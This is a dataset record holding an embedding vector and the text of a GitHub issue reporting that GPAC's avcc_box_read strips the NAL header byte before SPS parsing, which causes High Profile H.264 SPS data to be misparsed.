0.008609803393483162, -0.006128025706857443, -0.0019868777599185705, 0.006244472693651915, 0.0129037881270051, -0.00525831151753664, 0.0013728014891967177, 0.011433644220232964, 0.02636069990694523, 0.027306830510497093, 0.01566212624311447, 0.013813530094921589, 0.006342724896967411, 0.00744533259421587, 0.012714561074972153, -0.011884876526892185, -0.0013673430075868964, -0.01634625345468521, -0.0010653084609657526, 0.011775706894695759, 0.009024646133184433, 0.013391410000622272, -0.0070450459606945515, -0.008355075493454933, 0.002898439532145858, -0.008420576341450214, 0.011535534635186195, 0.011273529380559921, 0.017467055469751358, 0.020858576521277428, 0.00011468441516626626, 0.007983900606632233, 0.0036244140937924385, -0.03062557242810726, -0.0002767891564872116, -0.027277719229459763, -0.018034735694527626, 0.012001323513686657, 0.02836940996348858, -0.005960633046925068, -0.009563213214278221, 0.01056756917387247, 0.01617158204317093, -0.0032459613867104053, 0.016826597973704338, 0.01351513434201479, -0.004013783764094114, 0.02509433776140213, 0.00815129280090332, 0.020625682547688484, -0.011448199860751629, 0.001990516670048237, -0.006975905504077673, 0.006335447076708078, -0.003664442803710699, -0.019417544826865196, 0.00022743562294635922, 0.01460682600736618, -0.0012681810185313225, 0.0017694492125883698, -0.003164084395393729, -0.011972211301326752, -0.003644428448751569, -0.01419926155358553, 0.0018604234792292118, 0.01566212624311447, 0.0038573083002120256, 0.0021360754035413265, 0.0073179686442017555, 0.0006991371046751738, 0.0020323647186160088, -0.012321552261710167, -0.0251380056142807, -0.016462700441479683, -0.02369697205722332, 0.00489441491663456, -0.005866019520908594, -0.0035516347270458937, -0.027263164520263672, 0.001374620944261551, 0.0008665297646075487, 0.01219054963439703, -0.011368142440915108, 0.007510834373533726, -0.003265975508838892, 0.01182665303349495, -0.008959144353866577, -0.0018222142243757844, 0.023202072829008102, -0.008930032141506672, 0.008638914674520493, -0.02570568397641182, -0.0044832113198935986, 0.029417434707283974, 0.013384131714701653, -0.02375519648194313, 0.0049453601241111755, -0.017423389479517937, 0.002157909329980612, 0.022212272509932518, -0.014978000894188881, -0.02296917885541916, 0.002146992366760969, 0.00540750939399004, -0.0091847600415349, -0.010305562987923622, -0.021368032321333885, 0.007052323780953884, 0.023274851962924004, 0.01251805666834116, 0.0176271703094244, -0.009061035700142384, -0.000023297936422750354, 0.012758228927850723, -0.0018995424034073949, -0.017408832907676697, -0.00949043408036232, 0.016695594415068626, 0.029344653710722923, 0.0014064619317650795, 0.0005285604274831712, -0.007372553460299969, -0.0038245574105530977, 0.013340463861823082, -0.0002231143444078043, 0.022168604657053947, -0.02989777736365795, 0.015458344481885433, -0.0027947290800511837, 0.009555934928357601, 0.00009302117541665211, 0.005291062407195568, -0.008194960653781891, -0.0020578375551849604, -0.005629486870020628, -0.02307106927037239, 0.00034069857792928815, -0.015953244641423225, -0.015953244641423225, 0.01624436303973198, 0.012023157440125942, 0.0038864200469106436, 0.02438109926879406, 0.02098958007991314, 0.006557424087077379, -0.009905276820063591, -0.01522545050829649, -0.03129514306783676, -0.008682582527399063, 0.018413187935948372, 0.030800241976976395, -0.003941004630178213, 0.01255444623529911, -0.01768539473414421, 0.0014082813868299127, -0.013638859614729881, -0.0008183133904822171, 0.00981066282838583, 0.018718861043453217, -0.004446821287274361, 0.011724761687219143, 0.021833820268511772, 0.009293929673731327, 0.00910470262169838, 0.0035789271350950003, 0.003948282450437546, 0.013136682100594044, -0.01218327134847641, -0.0014792412985116243, -0.00364988693036139, -0.005163698457181454, 0.006069802213460207, -0.002718310570344329, 0.000493990199174732, 0.00711418641731143, -0.0004391781985759735, 0.015443788841366768, -0.00849335640668869, 0.005454815924167633, -0.006313613150268793, -0.0013191266916692257, 0.025574682280421257, 0.001915917731821537, 0.0188935324549675, -0.0001971866877283901, 0.019461212679743767, 0.02180470898747444, 0.010829574428498745, -0.0250652264803648, 0.001475602388381958, -0.026579037308692932, 0.005440260283648968, 0.018122071400284767, 0.004141147714108229, -0.03577835485339165, 0.01251805666834116, 0.02503611333668232, -0.002414456568658352, -0.008711694739758968, 0.003622594755142927, 0.01905364729464054, -0.010422009974718094, 0.002285273279994726, -0.003846391336992383, 0.01969410665333271, -0.006702982820570469, 0.024730440229177475, -0.00744533259421587, -0.015938688069581985, 0.009468600153923035, 0.018005624413490295, -0.010785907506942749, 0.014046424068510532, 0.006102552637457848, -0.016389921307563782, -0.04457010701298714, -0.0067138997837901115, 0.006047968287020922, -0.0018813475035130978, 0.01490522176027298, 0.02021811716258526, 0.004461377393454313, 0.012801896780729294, -0.017088603228330612, 0.004381319973617792, -0.012117770500481129, -0.0023162043653428555, -0.02780173160135746, 0.002270717406645417, 0.010036279447376728, -0.01563301496207714, 0.030683794990181923, 0.016040580347180367, 0.010429288260638714, -0.015764018520712852, -0.012947455048561096, 0.026972046121954918, 0.001564757083542645, 0.022765396162867546, 0.017365165054798126, 0.005487566813826561, -0.026186028495430946, 0.006168054416775703, 0.004541434813290834, -0.016011469066143036, 0.0006886750925332308, -0.014330264180898666, -0.024759551510214806, 0.00781650748103857, -0.03202293813228607, 0.009635992348194122, 0.0018904448952525854, -0.011833930388092995, -0.009475878439843655, -0.00244720745831728, -0.01825307309627533, -0.00978882983326912, 0.010800463147461414, -0.005909687373787165, 0.007496278267353773, -0.002572751836851239, -0.012037713080644608, -0.0007901113713160157, -0.028049180284142494, -0.011637425981462002, 0.005629486870020628, 0.003145889611914754, -0.01011633686721325, -0.016666483134031296, 0.006102552637457848, -0.002933009760454297, 0.01976688578724861, 0.01389358751475811, 0.014177427627146244, -0.019242873415350914, 0.0014583172742277384, -0.009323040954768658, 0.017918288707733154, -0.006120747420936823, -0.022154049947857857, -0.017248718068003654, 0.02113513834774494, 0.00878447387367487, 0.015400120988488197, 0.004494127817451954, -0.023973533883690834, -0.004308540374040604, 0.02027634158730507, 0.01185576431453228, 0.0162880290299654, 0.016666483134031296, -0.001200860133394599, 0.015734907239675522, -0.0014883388066664338, -0.025225339457392693, -0.015749461948871613, -0.008689860813319683, 0.003773611970245838, 0.0021797430235892534, 0.004286706913262606, 0.0029384682420641184, 0.015356454066932201, 0.007721894420683384, -0.0036990130320191383, 0.015283674001693726, -0.007656393107026815, -0.006015217397361994, -0.00910470262169838, -0.012750950641930103, -0.0004303081950638443, 0.0024635826703161, 0.0139445336535573, -0.025560125708580017, -0.005753211677074432, 0.009839775040745735, 0.0030967635102570057, -0.0244684349745512, 0.009570491500198841, 0.006935876794159412, -0.012474389746785164, -0.011601036414504051, -0.021513590589165688, -0.010254617780447006, -0.01625891774892807, -0.0038209185004234314, 0.004650603514164686, 0.012001323513686657, -0.015138115733861923, 0.0009770634351298213, -0.018136626109480858, -0.01976688578724861, -0.003360588802024722, -0.0035388984251767397, -0.006535590160638094, -0.02855863608419895, -0.00849335640668869, 0.030800241976976395, -0.021382588893175125, -0.021571815013885498, -0.008042124100029469, 0.00982521940022707, 0.01631714217364788, -0.002965760650113225, -0.013311352580785751, -0.012583558447659016, -0.01392997708171606, 0.001618431881070137, 0.013136682100594044, -0.010334675200283527, -0.00943948794156313, 0.021964823827147484, -0.01957765966653824, -0.010560290887951851, 0.021338921040296555, -0.004661520477384329, -0.017860064283013344, 0.03336207568645477, 0.01044384390115738, -0.015574791468679905, 0.008063958026468754, -0.03379875421524048, -0.011768429540097713, 0.01088779792189598, -0.0032641561701893806, -0.002008711453527212, 0.007055962923914194, 0.004210288170725107, -0.02509433776140213, -0.007474444340914488, -0.01390086580067873, 0.01697215624153614, 0.009279374033212662, 0.02641892246901989, -0.011928543448448181, 0.019271984696388245, -0.0026491701137274504, 0.02292551100254059, -0.012976567260921001, -0.012044990435242653, -0.025400010868906975, -0.013340463861823082, 0.018777085468173027, -0.00004878494291915558, 0.002732866443693638, -0.010684016160666943, 0.02448298968374729, -0.0080712353810668, -0.004858024884015322, 0.010269173420965672, 0.005298340227454901, -0.02769983932375908, 0.0108950762078166, 0.017074046656489372, 0.0011853944743052125, -0.0023198435083031654, -0.00042052846401929855, 0.0034406462218612432, 0.008253184147179127, -0.017467055469751358, -0.001800380414351821, 0.007663670927286148, -0.017845509573817253, -0.021353475749492645, -0.018063846975564957, 0.008100347593426704, -0.011178916320204735, -0.005134586710482836, 0.0071869660168886185, 0.0052801454439759254, 0.010058113373816013, -0.004956277087330818, 0.01823851838707924, 0.004905331414192915, 0.0020578375551849604, -0.00135187734849751, 0.018034735694527626, 0.02382797561585903, -0.003207752015441656, -0.018777085468173027, 0.008376909419894218, 0.006335447076708078, 0.002643711632117629, 0.00545117724686861, -0.0077364505268633366, 0.018515080213546753, -0.02158636972308159, -0.0016338975401595235, -0.0020596571266651154, 0.01280917413532734, 0.008573413826525211, -0.010247339494526386, -0.008900920860469341, 0.0091847600415349, -0.01484699733555317, 0.009242983534932137, 0.0076272813603281975, 0.002430832013487816, 0.014133759774267673, -0.0197086613625288, -0.005065446253865957, -0.006975905504077673, -0.0011198930442333221, 0.021950267255306244, 0.014432155527174473, -0.024628549814224243, 0.0231292936950922, -0.009279374033212662, 0.016884820535779, -0.0029839554335922003, -0.006047968287020922, -0.007801951840519905, -0.001587500679306686, -0.004585102200508118, -0.010698571801185608, 0.0006249931175261736, -0.020159894600510597, 0.0027110327500849962, 0.030800241976976395, -0.01085868664085865, 0.0018313117325305939, 0.02908264845609665, -0.01157192513346672, 0.019155537709593773, -0.011710206046700478, 0.006204443983733654, 0.005800518207252026, 0.008427854627370834, 0.017263274639844894, -0.018631527200341225, -0.0008833599858917296, -0.019111869856715202, -0.02570568397641182, 0.0030021502170711756, -0.01687026582658291, -0.005822352133691311, 0.005232838913798332, -0.007838341407477856, -0.0026073220651596785, 0.008100347593426704, 0.009635992348194122, 0.02842763438820839, 0.01114980410784483, 0.0001845640072133392, 0.03909709304571152, -0.005585819017142057, 0.013355020433664322, 0.005956993903964758, 0.010312841273844242, -0.0003654890460893512, 0.00032727987854741514, 0.001444671070203185, -0.008005734533071518, 0.0027783536352217197, -0.0036280532367527485, -0.004192093387246132, -0.007197882980108261, -0.005109114106744528, -0.02429376356303692, 0.006706621963530779, -0.033624082803726196, 0.02168826200067997, -0.0203054528683424, -0.003147709183394909, -0.0003065832133870572, -0.011768429540097713, 0.006892209406942129, 0.02839852310717106, -0.04663703963160515, 0.006168054416775703, -0.02168826200067997, 0.008464244194328785, 0.023187516257166862, 0.010356509126722813, -0.003340574447065592, -0.007962066680192947, 0.0071833268739283085, -0.01219054963439703, 0.0015847714385017753, -0.02563290484249592, 0.0017785466043278575, -0.0005362931988202035, -0.005578541196882725, -0.010094502940773964, -0.012831008061766624, -0.010130892507731915, -0.01281645242124796, 0.0114918677136302, 0.009337597526609898, -0.030916688963770866, 0.013107569888234138, 0.010662182234227657, -0.010079947300255299, 0.019504878669977188, 0.0031131389550864697, -0.00040710976463742554, -0.01522545050829649, 0.010691294446587563, -0.007867453619837761, 0.004679715260863304, -0.006422782316803932, 0.002567293355241418, -0.0024999724701046944, -0.010538456961512566, -0.017146827653050423, -0.006229916587471962, 0.026186028495430946, -0.007401665206998587, -0.00001331919884250965, 0.010356509126722813, 0.008042124100029469, -0.018718861043453217, 0.019533991813659668, -0.01459954772144556, 0.01972321793437004, 0.0008255913271568716, -0.004290345590561628, -0.02650625817477703, -0.012052268721163273, 0.002399900695309043, 0.0022743563167750835, -0.0014655952109023929, -0.012612669728696346, 0.001519270008429885, -0.006390031427145004, -0.0037445002235472202, -0.008915476500988007, -0.0005763219087384641, -0.005065446253865957, 0.0006727545987814665, -0.001467414665967226, 0.019825108349323273, 0.024861443787813187, 0.007474444340914488, -0.007751006167382002, -0.003164084395393729, 0.01459226943552494, 0.0182967409491539, -0.000835143611766398, 0.006939515937119722, 0.005975188687443733, -0.0008124000742100179, 0.013726195320487022, -0.011084302328526974, 0.029956001788377762, 0.0010152726899832487, 0.005669515114277601, 0.009286651387810707, -0.00029771323897875845, -0.0025636544451117516, 0.0012681810185313225, -0.02714671567082405, 0.0028038264717906713, -0.0084424102678895, -0.00013475560990627855, 0.014948888681828976, 0.005043612327426672, -0.00272376905195415, 0.010625792667269707, -0.008406020700931549, -0.02225594036281109, 0.004588741343468428, -0.004119314253330231, -0.005054529290646315, -0.0037335832603275776, -0.020116226747632027, 0.011870319955050945, 0.0067466506734490395, 0.006044329144060612, 0.004836191423237324, -0.000024193464923882857, 0.0071542151272296906, 0.020028891041874886, 0.010210949927568436, -0.023347631096839905, 0.0009124717325903475, 0.004959916230291128, 0.01219782792031765, -0.009985334239900112, -0.005247395019978285, -0.0049453601241111755, -0.005574902053922415, 0.010203671641647816, 0.004639687016606331, 0.009679660201072693, -0.00522192195057869, -0.0045559904538095, 0.0010134531185030937, 0.026928378269076347, 0.002947565633803606, 0.031615372747182846, 0.007707338780164719, -0.008966422639787197, -0.005793240386992693, 0.006320890970528126, -0.007103269454091787, 0.0162880290299654, -0.006761206313967705, 0.0003629872517194599, 0.008762639947235584, 0.010676737874746323, 0.023944422602653503, -0.00042507718899287283, -0.009272095747292042, 0.004865303169935942, 0.0014146496541798115, -0.00745261088013649, 0.0038645861204713583, -0.0251380056142807, -0.0013273142976686358, 0.010800463147461414, -0.005345647223293781, -0.013500578701496124, 0.00949043408036232, 0.007685504853725433, 0.014715994708240032, -0.00057450239546597, -0.0050909193232655525, 0.003759056096896529, -0.008937310427427292, 0.028776975348591805, 0.003984672017395496, -0.006149859167635441, -0.007612725254148245, 0.0053893146105110645, 0.005130947567522526, -0.03199382498860359, -0.005069085396826267, 0.02100413478910923, -0.0025472790002822876, 0.03816551715135574, 0.0017494348576292396, -0.0001634124928386882, -0.011360864154994488, 0.02109147049486637, 0.0021979378070682287, -0.03251783549785614, 0.003788167843595147, -0.005731377750635147, 0.013282240368425846, -0.0033005457371473312, -0.0066047306172549725, -0.006561063230037689, 0.01625891774892807, 0.005170976277440786, -0.011994045227766037, 0.008966422639787197, 0.005949716083705425, 0.008922754786908627, 0.005032695364207029, 0.018063846975564957, 0.016666483134031296, 0.013886310160160065, 0.012663615867495537, 0.005906048230826855, -0.024613993242383003, 0.009686938486993313, 0.0037172078154981136, -0.016026023775339127, 0.007256106473505497, 0.0016812041867524385, 0.010436566546559334, -0.028747864067554474, 0.009068313054740429, 0.01493433304131031, -0.01966499350965023, -0.017205050215125084, -0.005367480684071779, -0.0026946573052555323, 0.00782378576695919, -0.009031923487782478, 0.03173181787133217, -0.0030330815352499485, 0.015836797654628754, 0.025254452601075172, -0.014635937288403511, 0.008471522480249405, -0.003751778043806553, -0.008406020700931549, 0.0072087994776666164, -0.00019252425408922136, 0.0008324143709614873, -0.0017084964783862233, -0.01954854652285576, -0.004457738250494003, -0.014242928475141525, 0.024264652281999588, 0.026695484295487404, 0.026972046121954918, 0.002842035610228777, -0.020130781456828117, -0.004283067770302296, 0.007099630776792765, 0.024832332506775856, -0.004403153900057077, 0.009541379287838936, 0.005098197143524885, 0.011513701640069485, -0.0055275955237448215, 0.005349285900592804, 0.02500700205564499, 0.008711694739758968, -0.007416220847517252, 0.008042124100029469, 0.01085140835493803, 0.008085791021585464, 0.03196471184492111, -0.004217566456645727, 0.013085735961794853, 0.013056624680757523, -0.0015165407676249743, 0.019970668479800224, -0.020203562453389168, -0.002003252971917391, 0.0020341842900961637, -0.013209461234509945, -0.006215360946953297, 0.0062699452973902225, -0.03813640773296356, 0.031411588191986084, 0.004767050966620445, -0.00364988693036139, 0.013318629935383797, 0.01705949194729328, 0.0007086893892847002, 0.0011517340317368507, 0.005469372030347586, -0.007918398827314377, 0.015385565347969532, -0.01631714217364788, -0.01285284198820591, 0.006382753606885672, 0.004548712633550167, 0.008711694739758968, 0.013813530094921589, -0.019184650853276253, 0.01691393367946148, 0.01636081002652645, 0.002734686015173793, -0.0016711970092728734, -0.0030676517635583878, -0.013151237741112709, 0.008420576341450214, -0.009963500313460827, 0.010385620407760143, 0.011411810293793678, 0.009257540106773376, 0.01768539473414421, 0.020465567708015442, -0.00745261088013649, 0.0017394276801496744, 0.00678304024040699, -0.0224597230553627, 0.0005626757629215717, 0.021237028762698174, -0.016375364735722542, -0.007831063121557236, -0.014453989453613758, -0.005975188687443733, -0.003225947031751275, -0.0046469648368656635, 0.0026091416366398335, -0.002248883480206132, -0.008391465060412884, 0.005018139723688364, -0.018849864602088928, 0.007256106473505497, -0.013005678541958332, -0.020451011136174202, 0.004967194050550461, -0.012103213928639889, 0.025647461414337158, -0.011142526753246784, 0.006390031427145004, -0.014031868427991867, -0.01906820386648178, 0.010967855341732502, 0.006459171883761883, -0.0021215195301920176, -0.002145172795280814, -0.0229837354272604, 0.0067430115304887295, 0.02567657269537449, -0.0223141647875309, 0.001961404923349619, 0.006004300434142351, 0.0054475381039083, -0.022867288440465927, 0.002430832013487816, 0.012503501027822495, 0.005935159977525473, -0.01625891774892807, 0.009803385473787785, -0.026273364201188087, -0.010502067394554615, 0.006375475320965052, 0.021892044693231583, 0.014788773842155933, 0.024934222921729088, 0.005465732887387276, -0.023958979174494743, -0.02502155862748623, 0.02241605520248413, 0.0027001157868653536, 0.010807741433382034, -0.008537023328244686, -0.017321497201919556, 0.014635937288403511, 0.018660638481378555, -0.0004082469386048615, 0.021207917481660843, -0.013151237741112709, -0.030159784480929375, -0.005196449346840382, 0.010785907506942749, 0.010778629221022129, -0.0045086839236319065, 0.0041993712075054646, -0.007554501760751009, 0.016113359481096268, 0.007059602066874504, 0.0009752439800649881, -0.009133814834058285, 0.0016448145033791661, 0.01828218623995781, -0.0009302117396146059, -0.002507250290364027, 0.02176104113459587, 0.003176820930093527, 0.013464189134538174, -0.01625891774892807, 0.003469757968559861, 0.007583613507449627, -0.017365165054798126, -0.04081468656659126, -0.028354855254292488, 0.00915564876049757, -0.012547168880701065, 0.015021668747067451, -0.0061644152738153934, 0.031411588191986084, 0.010880520567297935, 0.006248111370950937, -0.011055191047489643, -0.005334730260074139, -0.0057240999303758144, 0.017918288707733154, 0.014002757146954536, -0.027961846441030502, -0.0197086613625288, -0.02308562584221363, 0.008231350220739841, -0.003937365487217903, 0.006153498310595751, 0.010058113373816013, -0.003422451438382268, -0.007976622320711613, -0.0010198213858529925, -0.010007167235016823, 0.00745261088013649, 0.0339151993393898, 0.0015483817551285028, -0.006491922773420811, 0.008129458874464035, -0.006564701907336712, -0.024046314880251884, -0.006662954110652208, -0.00026609969791024923, 0.029985113069415092, -0.005509400740265846, -0.017190493643283844, -0.008267739787697792, 0.014948888681828976, -0.01493433304131031, 0.005876936484128237, -0.002587307710200548, 0.008275018073618412, 0.014250206761062145, 0.00812218151986599, -0.009912554174661636, -0.005505761597305536, 0.0058623808436095715, -0.003999228123575449, 0.004712466150522232, 0.010087224654853344, -0.01360247004777193, 0.010436566546559334, 0.0001788781228242442, -0.008078513666987419, 0.002907537156715989, 0.005585819017142057, 0.014810607768595219, -0.008020290173590183, -0.0004507774137891829, -0.012547168880701065, 0.0101527264341712, -0.004690632224082947, -0.0054220655001699924, 0.008704416453838348, 0.018616970628499985, 0.007525390014052391, 0.011455478146672249, -0.02510889247059822, -0.010283729061484337, -0.0029293708503246307, 0.0014928875025361776, -0.021164249628782272, -0.013304074294865131, 0.014701439067721367, -0.014839719980955124, -0.013806252740323544, 0.0029421073850244284, -0.0070450459606945515, -0.026084138080477715, -0.022750841453671455, -0.005651320330798626, -0.007128742523491383, 0.019228316843509674, 0.0032586976885795593, 0.005196449346840382, 0.026098692789673805, 0.037670619785785675, -0.0017958317184820771, -0.000539477332495153, -0.0015101726166903973, 0.0162880290299654, -0.002587307710200548, -0.0006827617762610316, -0.014948888681828976, 0.0021524508483707905, 0.018005624413490295, 0.018646081909537315, 0.005240116734057665, 0.005494844634085894, 0.0019104592502117157, 0.01684115268290043, -0.019140983000397682, 0.01560390368103981, 0.016695594415068626, 0.002461763331666589, -0.001603876007720828, 0.002521806163713336, -0.0018531455425545573, -0.007954788394272327, -0.015458344481885433, -0.014665049500763416, 0.01122986152768135, 0.02841307781636715, -0.010676737874746323, 0.03714660555124283, 0.011608314700424671, 0.004122952930629253, 0.018427744507789612, 0.02653536945581436, -0.0007186965667642653, 0.01691393367946148, -0.011608314700424671, 0.020858576521277428, 0.008209516294300556, 0.00919203832745552, 0.0018795280484482646, -0.03860219568014145, 0.0203782320022583, 0.002580029657110572, 0.005276506766676903, 0.004621491767466068, 0.03251783549785614, -0.02976677566766739, -0.006386392284184694, -0.011280806735157967, 0.023420412093400955, 0.0019705023150891066, 0.003678998677060008, -0.007074157707393169, -0.01356608048081398, 0.011761151254177094, 0.05123669654130936, -0.007216077763587236, 0.0061316643841564655, -0.008187682367861271, -0.006208083126693964, 0.01419926155358553, -0.036942824721336365, 0.021295253187417984, 0.005010861903429031, 0.0236533060669899, 0.01294017769396305, -0.018689749762415886, -0.004475933033972979, -0.0027637977618724108, -0.006692065857350826, 0.002325301757082343, 0.013012956827878952, -0.003375144675374031, -0.003529801033437252, -0.016520924866199493, 0.009905276820063591, 0.005571263376623392, 0.0084424102678895, 0.004359486047178507, 0.003053095890209079, 0.006324530113488436, 0.0021051440853625536, 0.00574229471385479, -0.007092352490872145, 0.005669515114277601, -0.004650603514164686, 0.01392997708171606, -0.007685504853725433, 0.009381264448165894, -0.012088658288121223, 0.0013609747402369976, -0.010436566546559334, -0.00459238002076745, 0.004435904324054718, 0.008013011887669563, -0.03775795176625252, 0.01010905858129263, 0.00024062689044512808, -0.0015629376284778118, -0.0011581021826714277, -0.0067393723875284195, 0.004250316880643368, -0.0011189832584932446, 0.028733307495713234, 0.00016523197700735182, -0.014024590142071247, 0.0019086397951468825, -0.011586480773985386, 0.007368914317339659, -0.009293929673731327, 0.007539946120232344, -0.010582124814391136, 0.005815074313431978, 0.042968958616256714, -0.010269173420965672, 0.012496222741901875, 0.02163003757596016, 0.0010398357408121228, 0.019475767388939857, 0.015720350667834282, -0.004042895510792732, -0.002161548240110278, 0.0108222970739007, 0.0025636544451117516, -0.011542812921106815, 0.019927000626921654, 0.00018763438856694847, -0.0073179686442017555, 0.0061353035271167755, 0.0077582839876413345, -0.01818029396235943, -0.03062557242810726, 0.000624083389993757, 0.011790262535214424, 0.014621381647884846, -0.006379114463925362, 0.0035243425518274307, -0.012692727148532867, 0.0071796877309679985, 0.00781650748103857, -0.0028820643201470375, -0.01044384390115738, 0.005502122920006514, 0.0049489992670714855, 0.00852246768772602, -0.009621436707675457, -0.019956111907958984, -0.038252852857112885, 0.007197882980108261, 0.011455478146672249, 0.004152064677327871, -0.020844019949436188, 0.013216739520430565, 0.00607708003371954, -0.018471412360668182, 0.02043645642697811, -0.0016366267809644341, 0.006419143173843622, 0.01422837283462286, -0.015502012334764004, 0.02103324607014656, 0.008842697367072105, 0.005039973650127649, 0.028747864067554474, -0.0216445941478014, -0.00763455918058753, -0.011397254653275013, -0.008697138167917728, 0.0028656888753175735, -0.011047912761569023, -0.01011633686721325, -0.0014846997801214457, -0.032779842615127563, 0.0007437145104631782, -0.004963555373251438, 0.008930032141506672, -0.007408943027257919, 0.022794509306550026, -0.006535590160638094, 0.0033678668551146984, -0.009002812206745148, -0.003147709183394909, -0.0030167060904204845, 0.0088135851547122, -0.002785631688311696, -0.00023209805658552796, 0.0016311682993546128, -0.004832552280277014, -0.008951866067945957, 0.05036334693431854, 0.015400120988488197, 0.012641781941056252, 0.00663020322099328, -0.012139604426920414, 0.0188935324549675, 0.014759662561118603, -0.022023046389222145, -0.018122071400284767, 0.01954854652285576, 0.003911892883479595, -0.0035989414900541306, 0.02911175973713398, -0.023551413789391518, -0.006914042867720127, -0.006775762420147657, -0.015924133360385895, -0.0037044715136289597, -0.018034735694527626, -0.014090091921389103, -0.002858411055058241, -0.003342394018545747, 0.024177316576242447, -0.01826762966811657, -0.0030640128534287214, 0.006026134360581636, -0.013573357835412025, -0.012758228927850723, 0.015618459321558475, -0.02512344904243946, 0.007427137810736895, -0.01636081002652645, -0.013362297788262367, 0.005960633046925068, 0.0025563763920217752, -0.012656337581574917, 0.0059933834709227085, 0.011797540821135044, -0.01351513434201479, -0.023347631096839905, 0.005498483777046204, 0.01219054963439703, -0.007292496040463448, 0.0050872801803052425, 0.008922754786908627, -0.0035680101718753576, -0.01215416006743908, -0.016637371852993965, 0.006990461610257626, -0.020174449309706688, 0.003860947210341692, 0.0031222363468259573, 0.0008255913271568716, 0.010218228213489056, -0.0046469648368656635, -0.014978000894188881, 0.015021668747067451, -0.008507912047207355, -0.019111869856715202, -0.017379721626639366, -0.007052323780953884, -0.02040734328329563, -0.007161492947489023, 0.010291007347404957, -0.016375364735722542, -0.0029148149769753218, 0.019897887483239174, 0.030829355120658875, -0.021921155974268913, 0.010960577987134457, 0.002294370671734214, -0.005061807110905647, -0.013507856987416744, 0.006688427180051804, -0.012059547007083893, -0.027437834069132805, 0.010909631848335266, -0.024235541000962257, -0.01393725536763668, -0.0028056458104401827, -0.018616970628499985, -0.011615592055022717, -0.013340463861823082, -0.0049817501567304134, -0.009635992348194122, -0.002718310570344329, -0.01691393367946148, -0.01908275857567787, -0.010174560360610485, 0.0278890673071146, 0.022663505747914314, 0.015589348040521145, -0.020625682547688484, -0.0003243231913074851, 0.0011144345626235008, -0.0051200310699641705, 0.008209516294300556, 0.008100347593426704, 0.003009428270161152, 0.012008600868284702, -0.00422848341986537, 0.029330099001526833, -0.024788664653897285, -0.0033951590303331614, -0.0011808457784354687, -0.013915421441197395, 0.007962066680192947, -0.012372498400509357, -0.008260462433099747, -0.010553013533353806, 0.017350608482956886, -0.003040359588339925, -0.008034845814108849, -0.005065446253865957, 0.01818029396235943, 0.00645189406350255, 0.0017448861617594957, 0.010996967554092407, 0.008595246821641922, -0.002614599885419011, 0.004868941847234964, -0.009257540106773376, 0.03924265131354332, -0.004788884427398443, 0.007751006167382002, -0.021455368027091026, 0.011360864154994488, 0.018165739253163338, 0.0028365771286189556, 0.01831129752099514, -0.0021215195301920176, -0.007576335687190294, 0.0049781110137701035, 0.006357280537486076, -0.0061607761308550835, 0.004082924220710993, -0.0005954264779575169, 0.01622980646789074, 0.02174648456275463, 0.010596680454909801, -0.02384253218770027, 0.04247405752539635, -0.006855819374322891, -0.000638639263343066, -0.005494844634085894, 0.000504452211316675, -0.01759805902838707, -0.015196339227259159, -0.006146220490336418, -0.01484699733555317, 0.021877488121390343, 0.015021668747067451, 0.017845509573817253, 0.009716049768030643, 0.007518112193793058, 0.004985388834029436, 0.015094447880983353, 0.01090235449373722, -0.03394431248307228, -0.0009315763600170612, -0.009257540106773376, 0.0020014336332678795, -0.002234327606856823, 0.011542812921106815, 0.012357941828668118, 0.02496333420276642, -0.007794674020260572, 0.0003766333975363523, 0.02093135565519333, 0.011280806735157967, -0.004454099107533693, -0.0055312346667051315, -0.0028311186470091343, -0.010705850087106228, 0.015531124547123909, 0.01625891774892807, -0.0012863759184256196, -0.0013391409302130342, 0.0176999494433403, 0.0065792580135166645, 0.019432099536061287, -0.0076200030744075775, -0.019257429987192154, 0.025196228176355362, 0.040989357978105545, 0.0006318161613307893, -0.014155593700706959, -0.03048001229763031, 0.0007755554979667068, 0.00044964023982174695, 0.0030894854571670294, -0.012030434794723988, 0.013376854360103607, -0.011935821734368801, -0.026870155707001686, 0.018500523641705513, 0.04043623432517052, -0.0008756271563470364, 0.008435132913291454, -0.002903898013755679, 0.006357280537486076, -0.0203782320022583, -0.0016484534135088325, 0.013384131714701653 ]
1,758
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
generating a sample Mp4 file using ffmpeg and encoding it to 264 high profile `ffmpeg -f lavfi -i testsrc=size=1920x1080:duration=0.5 -c:v libx264 -profile:v high -level:v 4.0 -pix_fmt yuv420p -y /tmp/main.mp4` the function [avcc_box_read](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2675) extract the SPS/PPS from the AVCC atom. The first byte of the sequenceParameterSets buffer will contain the nal_hdr. Then, there is a [test](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2731) checking for the profile and if the profile is 100, the code will be calling [gf_avc_read_sps](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2737) while removing the 1st byte of the sequenceParameterSets buffer. `idx = sl ? gf_avc_read_sps(sl->data+1, sl->size-1, &avc, 0, NULL) : -1;` This function will then call [gf_avc_read_sps_bs](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5402) which will call [gf_avc_read_sps_bs_internal](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5091) with nal_hdr being set to 0. `return gf_avc_read_sps_bs_internal(bs, avc, subseq_sps, vui_flag_pos, 0);` Which then in the [code](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5106), will try to parse the 1st byte of the bitstream as nal_hdr. However, it seems we did remove the byte in avcc_box_read and instead of parsing the nal_hdr, we will be parsing the profile_idc Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
avcc_box_read : Invalid parsing of SPS from AVCC atom for H264 High Profile?
https://api.github.com/repos/gpac/gpac/issues/1787/comments
1
2021-05-11T22:21:02
2021-05-12T09:29:11Z
https://github.com/gpac/gpac/issues/1787
888,899,111
1,787
false
